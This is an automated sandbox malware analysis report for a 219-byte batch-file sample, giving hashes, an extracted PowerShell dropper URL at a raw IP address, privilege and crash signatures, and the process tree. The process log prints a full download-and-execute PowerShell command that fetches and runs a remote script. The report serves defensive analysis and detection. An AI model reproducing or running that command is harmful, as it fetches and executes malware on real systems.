Analysis
max time kernel: 111s
max time network: 135s
platform: windows10_x64
resource: win10v200430
submitted: 15-05-2020 19:19
Static task: static1

Behavioral task: behavioral1
  Sample: 399c49693a18efe92bd488070ce05958.bat
  Resource: win7v200430 (windows7_x64)
  0 signatures, 0 seconds

Behavioral task: behavioral2
  Sample: 399c49693a18efe92bd488070ce05958.bat
  Resource: win10v200430 (windows10_x64)
  0 signatures, 0 seconds
General
Target: 399c49693a18efe92bd488070ce05958.bat
Size: 219B
MD5: 9f6f9d198ba17e88e3aaeab145105bbd
SHA1: 24970fd1d68dd8c11b435442a710939a1d25def5
SHA256: e929eaff3a0856e72e5085f1829ec9794c8f729a198e10ff6376bd423bf6b593
SHA512: 55359357d68d59d6dd7412600bb3ce137de55bc4dbd2569c2fc8082b9e070e20f74e90533caa09c455a8d97403600203abac9612c6f5aee39dfe8007062491bf
Score: 10/10
Malware Config
Extracted
Language: ps1
Source: URLs
ps1.dropper: http://185.103.242.78/pastes/399c49693a18efe92bd488070ce05958
Signatures

Program crash (1 IoC)
Processes:
  pid   pid_target  process       target process
  3700  3196        WerFault.exe  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
  description                pid   process
  Token: SeRestorePrivilege  3700  WerFault.exe
  Token: SeBackupPrivilege   3700  WerFault.exe
  Token: SeDebugPrivilege    3700  WerFault.exe

Suspicious behavior: EnumeratesProcesses (14 IoCs)
Processes:
  pid   process
  3700  WerFault.exe (14 identical entries)
Processes

1. C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\399c49693a18efe92bd488070ce05958.bat"
   PID: 2688

   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/399c49693a18efe92bd488070ce05958');Invoke-ESZSYMZBHPFU;Start-Sleep -s 10000"
      PID: 3196

      3. C:\Windows\SysWOW64\WerFault.exe
         Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 704
         PID: 3700
         Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses